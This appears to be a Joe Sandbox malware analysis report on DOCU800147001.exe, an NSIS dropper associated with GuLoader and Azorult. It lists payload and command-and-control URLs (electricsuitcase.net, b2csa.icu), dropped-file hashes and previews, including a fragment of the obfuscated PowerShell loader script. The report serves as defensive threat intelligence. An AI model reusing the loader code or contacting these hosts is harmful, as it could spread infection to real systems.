              http://electricsuitcase.net/wp-includes/block-bindings/wTryLAihFvcVmUK202.bin2msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://b2csa.icu/m32msiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Iconpowershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://b2csa.icu/PL341/index.phpVVWTmsiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://nsis.sf.net/NSIS_ErrorErrorDOCU800147001.exe, DOCU800147001.exe.2.drfalse
                          		high
                          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://b2csa.icu/PL341/index.phpalmsiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://b2csa.icu/PL341/index.phpFvmsiexec.exe, 00000008.00000002.2616759739.000000000699A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://nsis.sf.net/NSIS_ErrorDOCU800147001.exe, DOCU800147001.exe.2.drfalse
                              		high
                              http://b2csa.icu/msiexec.exe, 00000008.00000002.2616759739.0000000006A02000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2616759739.00000000069DD000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.micropowershell.exe, 00000002.00000002.2546703492.0000000008332000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2527630104.0000000004C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2527630104.0000000004D96000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/powershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2531096642.0000000005CAA000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://b2csa.icu/P5msiexec.exe, 00000008.00000002.2616759739.00000000069DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2527630104.0000000004C41000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://b2csa.icu/PL341/index.phpjmsiexec.exe, 00000008.00000002.2616759739.0000000006A02000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          107.151.162.135
                                          		electricsuitcase.netUnited States
                                          		21859ZNETUSfalse
                                          104.21.32.1
                                          		b2csa.icuUnited States
                                          		13335CLOUDFLARENETUStrue

                                          General Information

                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1592041
                                          Start date and time:2025-01-15 17:36:09 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 5s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:9
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:DOCU800147001.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@6/15@2/2
                                          EGA Information:
                                          • Successful, ratio: 33.3%
                                          HCA Information:
                                          • Successful, ratio: 91%
                                          • Number of executed functions: 68
                                          • Number of non-executed functions: 27
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                          • Excluded IPs from analysis (whitelisted): 13.107.253.45, 52.149.20.212, 4.175.87.197
                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target msiexec.exe, PID 1944 because there are no executed function
                                          • Execution Graph export aborted for target powershell.exe, PID 5664 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtCreateKey calls found.
                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          11:37:01API Interceptor37x Sleep call for process: powershell.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          107.151.162.13524010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          • electricsuitcase.net/wp-includes/block-bindings/wTryLAihFvcVmUK202.bin
                                          104.21.32.124010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          • b2csa.icu/PL341/index.php
                                          bIcqeSVPW6.exeGet hashmaliciousFormBookBrowse
                                          • www.rafconstrutora.online/sa6l/
                                          BalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                          • www.aziziyeescortg.xyz/2pcx/
                                          25IvlOVEB1.exeGet hashmaliciousFormBookBrowse
                                          • www.masterqq.pro/3vdc/
                                          QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                          • www.mzkd6gp5.top/3u0p/
                                          SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                          • redroomaudio.com/administrator/index.php

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          electricsuitcase.net24010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          • 107.151.162.135
                                          b2csa.icu24010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          • 104.21.32.1

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          ZNETUShttps://imtcoken.im/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.184
                                          24010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          • 107.151.162.135
                                          https://hmflowcontrols.com/ch/CHFINAL/50477/Get hashmaliciousUnknownBrowse
                                          • 23.236.112.179
                                          http://www.telegramdd.org/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.208
                                          http://www.telegramii.org/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.209
                                          http://m.escritoresunidos.com/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.209
                                          https://www.xietaoz.com/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.185
                                          http://www.telegramhj.org/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.208
                                          http://www.telegram-gd.com/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.208
                                          https://whatsapp-cy.com/Get hashmaliciousUnknownBrowse
                                          • 199.91.74.184
                                          CLOUDFLARENETUSfirstontario.docxGet hashmaliciousUnknownBrowse
                                          • 1.1.1.1
                                          lummm_lzmb.exeGet hashmaliciousLummaCBrowse
                                          • 104.21.67.165
                                          https://solve.lzmb.org/awjsx.captcha?u=a85c9e46-f1ff-475f-b74c-c23cf236a082Get hashmaliciousUnknownBrowse
                                          • 104.21.78.33
                                          https://solve.xfzz.org/awjsx.captcha?u=c56ed68e-fc67-4e24-b8ac-6adc700e0877%20#%20%E2%9C%85%20''I%20am%20not%20a%20robot%20-%20reCAPTCHA%20Verification%20ID:%203467''Get hashmaliciousUnknownBrowse
                                          • 104.21.32.1
                                          https://tinyurl.com/AmconconstructionGet hashmaliciousUnknownBrowse
                                          • 104.17.25.14
                                          Zohobooks Voip CaIIer left (4) voice message from +1 (___) ___-__92 [MSG ID-zNeaDpAKAIgeQjKGl].emlGet hashmaliciousHTMLPhisherBrowse
                                          • 104.17.25.14
                                          https://bluefiles.com/fr/reader/document/2c33782e98658214c7dff875dd234fc3b9b9a60915ac1685fe35abcc657c139dGet hashmaliciousUnknownBrowse
                                          • 1.1.1.1
                                          https://u13762205.ct.sendgrid.net/ls/click?upn=u001.2N-2FFSd8Mh5tdTcK2pEXUToH0F5-2Fq3FDo8pnKFzcXMK24EOVQRPQXOzov3WP6TeQDbpOFMAzOhzk6g52qaRBXMg-3D-3DIjNL_PKcFXsnzduNOkTk1M1BuFSXBwpDtJ5JnfBBGS8mWfSDpSIzzZrzaRAqzsWn9I2SACyGbOCQAHofmU9ue-2Bfpl8m5UVDAXfATbU3zHgCM2w6TpOzhFbmwlUQoZzHTxRoJD6sBCzgzJz3SY7rmsp-2BquYHmL2DTOkQggmMFIfKhNPVaBf8NTmimDBPZdcr9YqjF8L6hryY10MBbjsSOUH778gw-3D-3DGet hashmaliciousUnknownBrowse
                                          • 104.18.10.207
                                          i686.elfGet hashmaliciousMiraiBrowse
                                          • 8.44.96.126

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dll#U8fdd#U89c4#U540d#U5355.exeGet hashmaliciousUnknownBrowse
                                            hnTW5HdWvY.exeGet hashmaliciousAgentTesla, GuLoaderBrowse

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):53158
                                              Entropy (8bit):5.062687652912555
                                              Encrypted:false
                                              SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                              MD5:5D430F1344CE89737902AEC47C61C930
                                              SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                              SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                              SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                              C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kreditformidlernes67.hve

                                              Download File
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:Unicode text, UTF-8 text, with very long lines (4303), with CRLF, LF line terminators
                                              Category:dropped
                                              Size (bytes):71505
                                              Entropy (8bit):5.166626957385969
                                              Encrypted:false
                                              SSDEEP:1536:3pkD/PCEXDxGNlmE3u1u0vzMBj8HuPavptArCLB8+iqj:ZkD/rzVCuk07MBwvxtAro5xj
                                              MD5:DCD80EB1AD2E5394274FFDCE163D4815
                                              SHA1:F409BB772F6FCACE2AE9505DBF1764186178158F
                                              SHA-256:16743054909C0B954ADECE9179B026560C1671DB30E2CB397DDC4C3742C57BC4
                                              SHA-512:8FA32C316430DB3E59401ADD31221F2B46EF56732F1CBE8D02576CB140163B189B7EFFC43223F3F59DE80BD936231B1032A4673980BE7653EBE647E9EBAA1ED5
                                              Malicious:true
                                              Reputation:low
                                              Preview:$Udviskes=$Tricorporate;........$Allagite = @'.Nedkast. Monoc.$MarkereHhoofyp oVgtfyldo,eversesSlyngedeUdtry sg ElectroFolk stwCamellus Grshop=Unawkwa$Di itriUNona.midP eurotsDemokratSockmake DelmoddUd aden;Genvo d.GamgiagfUndithyuLr rbalnActinolcOverreatKalk,aniClankinoSpecie nSnorkel SoutherCCentrifoNoto relSerieprpPeerl.soArseniatFuldstnoBoer,temBertramiReversieSoundbosLandshe Unruef(Gramsci$Erhv,rvPBiberetrHorograarangstieannabeldCineritiS.ttepaaAutologlEgn udv,Antilyt$SynchroIEnclavinViderekeSgne agxEs ancipSibilateCannibarHjemlertUnpate sineffi ) Di sek Exorcis{Semia a.Handlin.hydroxy$DyslektUImpreg,nGalletarSa arita Foxi,edSek.teniElimin cFamilisaAposioplhanapstiProvokaz Mi jree DecamesHanap.r F,gocyt(AlcedinSDawtieeoAftensvv,ngakorsTitelreeAfs,idnkV.vensoa Icon mnOmg geld Unso eeArereelnMorrowt Hystren'todagesITaffel nNabonuldAxemenaaUlve.ornTrotskiksmadder Recusee$Syv iledSexdrifeRari anmGuidewaiforstuvdR flektoAidmanrmModgaarPTimotqx Bo,tvanOStaldbrpCoriamy KommanrC,iticia

                                              C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\DOCU800147001.exe

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:dropped
                                              Size (bytes):963872
                                              Entropy (8bit):7.674079791252531
                                              Encrypted:false
                                              SSDEEP:24576:YuA8/BOypdAGTekMh6RJNBIQll+hQT2jiux5A:+IBOypdAGTRrRFIQlluQsxq
                                              MD5:AB99E49A4471901468BBBD9CCF228DE0
                                              SHA1:2B7302E1B24A9994E2924E97E627C1F5DE23EAAA
                                              SHA-256:8F856E9882D312F6A51F265796C6A68C1914D1C51C59FC1964484FA5AC130F34
                                              SHA-512:BCDA816D71AAB2B798ED2D2764099EEA01CE51C9A276377A0D5CA3AED4AAF328D700204DBBC8539D16EB70529D390D7113E7700C98652CAA4512C2979EF9313C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 18%
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x......z...x..........i...,"..t.......y...Richx...........................PE..L....f.R.................\....9......0.......p....@..........................@=..............................................s....... ;................. ............................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data.....9..........r..............@....ndata....... :..........................rsrc........ ;......v..............@..@................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\DOCU800147001.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\arrogantly.wea

                                              Download File
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1526575
                                              Entropy (8bit):0.29530349075836504
                                              Encrypted:false
                                              SSDEEP:768:ASVaka6XCOUX+4bFIT0hio6OHaHuPqo8MObUS8wQ9x2q0gQIsH9f9aoDpvfPUGRM:TLDlBdK
                                              MD5:B12744C545F373B12899405E7B06703C
                                              SHA1:00444A0C0ED55B4BCBD428E9367C48B943E6B6E5
                                              SHA-256:3F08EB75471C7749CF2832874DFE9D87D7C92F6C0B287F44C61BA87132DBB6B5
                                              SHA-512:356BC941E6D7E77BBC6809C2E8B7835DAF26A649478FAD3BBF96CC0FF5F7AC5380433A7BDF1706778E2E3AD60932E91C3FCFD6A2D161F25A19626396BFB7F2C7
                                              Malicious:false
                                              Preview:.........................&...........................................................................................................................................................................?..................................................................U..................................................................................!................d...........................................................................................A.........................................................E.........................................................................Q.....................................................................................................................................................................................................................................................................................................................................x.....................................................................................

                                              C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\brudsikreste.txt

                                              Download File
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:ASCII text, with very long lines (382), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):455
                                              Entropy (8bit):4.237067132953465
                                              Encrypted:false
                                              SSDEEP:12:EBdbnteRhtBkSebie21b+Kdg6B3nmhBKnTy19h:EX49MGJfg6FnlToL
                                              MD5:C66131BE12E218CB451A5CDEFEFD93EF
                                              SHA1:5D3EFE4F715281097AC9EF67580349088D89D858
                                              SHA-256:FA8A7D0FAD17FACB47C04904463406343D46E9E4A6932231F64EE2BCD8562C36
                                              SHA-512:3F71B278BB06786AF7422846520BFCDADAF5D7FD64A1AB3023210FA7A82B1FD3C18E504DDEC18B5CE7F931A966C30C1738234592A51B59AB79BEA69D24C998ED
                                              Malicious:false
                                              Preview:vrdistigningen opsamlingsdepoter archwife streetlike roeoptagerne tantalifluoride tightlier,gdningsopbevaringer bouncingly heroarchy tetragonus recivilize grundendes bsses,kortege azotin daarligdom briggsk insularize spenses cadges,kallunerne eradicate ultraconfident tallerkenfuld skredet aya.smkfyldtes vulkaner sengevderne hldedes temperere poetizers dotering stangende talenttrf..iridium hanny hoghead ergotist frygtendes samarkand rrigere strmmedes..

                                              C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\fistres.pho

                                              Download File
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):4656676
                                              Entropy (8bit):0.2967284544570692
                                              Encrypted:false
                                              SSDEEP:768:9kAMMC60OOax4t/q+BXJum2LG6Y59t54dkUOfsnutif04CG4Fz20jIz7U+376EyQ:6MRjkS1bFdh1k8Z8ZJWVmInj
                                              MD5:5A6329442D47F58811E3D0AB09312866
                                              SHA1:D84BD4A23998795019EF4F370535ED5DD7AFC97E
                                              SHA-256:B146D608F302E262857711B5E9A9B0FD4409E952A025854F36B9E2D9325E0FCE
                                              SHA-512:48F26A08F614182D59EC010B1106D0E05CF55C9F48AE70F706435E41D92E786E9C9E78008DE26E6136A154D0D3D2B92FE519FC3157940BC2F34F3DAAD75B3D47
                                              Malicious:false
                                              Preview:...............................................................g.......................................................................................,................................................................................................................................................................................................................................>.....................................................................................................................................................................G..............................................................................................................w...l............................................................................................................d.........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\martyrdds.ele

                                              Download File
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2400319
                                              Entropy (8bit):0.2970727664331768
                                              Encrypted:false
                                              SSDEEP:768:QYEycGQ020iR3UzxToaNbm/CQIHqWHLCk1jPFAsKWj2BqcuzyxA41UqJFmTzU3os:csTf/jhESARl/
                                              MD5:AEE4BB6A9E3BD66FD8D2C7F9F20D6C75
                                              SHA1:BDAB62C341DFEC94CB2E8D27C35531D8A849541E
                                              SHA-256:5ECDFCC07F21D459544978A2CC6CE6CEA67E9CA8BC46D7CA0B069E6F492BD4A3
                                              SHA-512:E2EAE217804C6596D2D23025CE1358CFB8FAFFDA09DE89C93E044838F18E83237094BEF872D49BF99F47326272876A47E6E236D6DB0106B56DF42BE7C5F82472
                                              Malicious:false
                                              Preview:.............._...............................................................................................................................................,.........................................................................................................................................................................................................................................................................................................................................................................................n..............................................................................................................................................................................................................................................................................................................................................................!...............................................................................................................

                                              C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\Kulds\vagabondage.fis

                                              Download File
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2221689
                                              Entropy (8bit):0.2975722061630014
                                              Encrypted:false
                                              SSDEEP:768:oiVj0sDGFYdWIWsIdL0HBu2W06kRV073deJ5twc39KRw7kbrGgu/hIgh6QxBPK6I:bjJjsTWRuje
                                              MD5:6630050C1BC0F9002CFFD4E3878AF422
                                              SHA1:EDEF39DB60837C4CBA254AAB55D03D3566C3ECA8
                                              SHA-256:40E701BA7606B5251E9E5F3B6376B0AB06DBBA76BE2DB51814F9A6335FC673C4
                                              SHA-512:899B32617790B94FCFBDB3ABDCD3CDCA899735851416BEDBF1533123E4E92491A612A3D223FC051D16FA04C28BB74721F45705BF98E4B1C462C1C813BAEAA2D2
                                              Malicious:false
                                              Preview:.................................................................................................................................................................C...................................................................................................................................................................m............................................................................................................................................................................................Z.....................................k..............................................................................................................................................................................=........................................................................................................................1.....................................r......................................................7...................................................Y......

                                              C:\Users\user\AppData\Local\Ramtils\Formaldehyds\tyngdepunkterne\decouple.Chr

                                              Download File
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):359849
                                              Entropy (8bit):7.600028553847548
                                              Encrypted:false
                                              SSDEEP:6144:VLhZ6DqSZZ1oTW97PURnyz+/+2ysYwEyfwqF8YvF+yGImhDG00:+qKwW97PU0z+N5IqFlGi00
                                              MD5:9CAE95341FEE19C573B15CDEBA15077B
                                              SHA1:91CD113B2FF21CC6A1C2B11D0812080B61C6CB68
                                              SHA-256:9CB1A6246F58400EB6C3319E2CA0524BD8392FA23E727439706DC77F7F021EE5
                                              SHA-512:92464C29B5F4F652622C9B5EE74BFE706CBC3335892461C44EFFCF82902D7A4DE5087C8D00724F6900F23F9D7AC8E3B990C82BD784E6FF8F1525940F55FE57C2
                                              Malicious:false
                                              Preview:.......----.......Y......eeee.........$....................99......................T..........................}.fff..fff...+..a.........55...B................. .,........[[.......................................II.e......................00......|..jj..........?...d........hh...:..............................^...........f...............................L.88...........e........................... ..................................]..||.SS....d.........]................c.............,..,...`.......|...zz...&&..............$.....2...........d....................R.x........GGG.....PP........ .=.......g..o.....SS....PPPPP.,.@....c......................................O..........................W.....s.........V.................O.............v.>.........##..UUU......."""...............................................................aa.................._....T.lll....E.......l...:..gg.........mmmm...@.....PPP.....N.......S.|.....7..........&&.###....FFFF.ZZ.....OO..N............,..a.........

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qte5eam.rut.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvm45sqb.g4z.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4xyj1co.gpr.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxvwrc2y.jrq.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\nsx7F0.tmp\nsExec.dll

                                              Download File
                                              Process:C:\Users\user\Desktop\DOCU800147001.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):6656
                                              Entropy (8bit):5.028908901377071
                                              Encrypted:false
                                              SSDEEP:96:W7GUaYNwCLuGFctpiKFlYJ8hH4RVHpwdEeY3kRlDr6dMqqyVgN738:Iygp3FcHi0xhYMR8dMqJVgN
                                              MD5:51E63A9C5D6D230EF1C421B2ECCD45DC
                                              SHA1:C499CDAD5C613D71ED3F7E93360F1BBC5748C45D
                                              SHA-256:CD8496A3802378391EC425DEC424A14F5D30E242F192EC4EB022D767F9A2480F
                                              SHA-512:C23D713C3C834B3397C2A199490AED28F28D21F5781205C24DF5E1E32365985C8A55BE58F06979DF09222740FFA51F4DA764EBC3D912CD0C9D56AB6A33CAB522
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
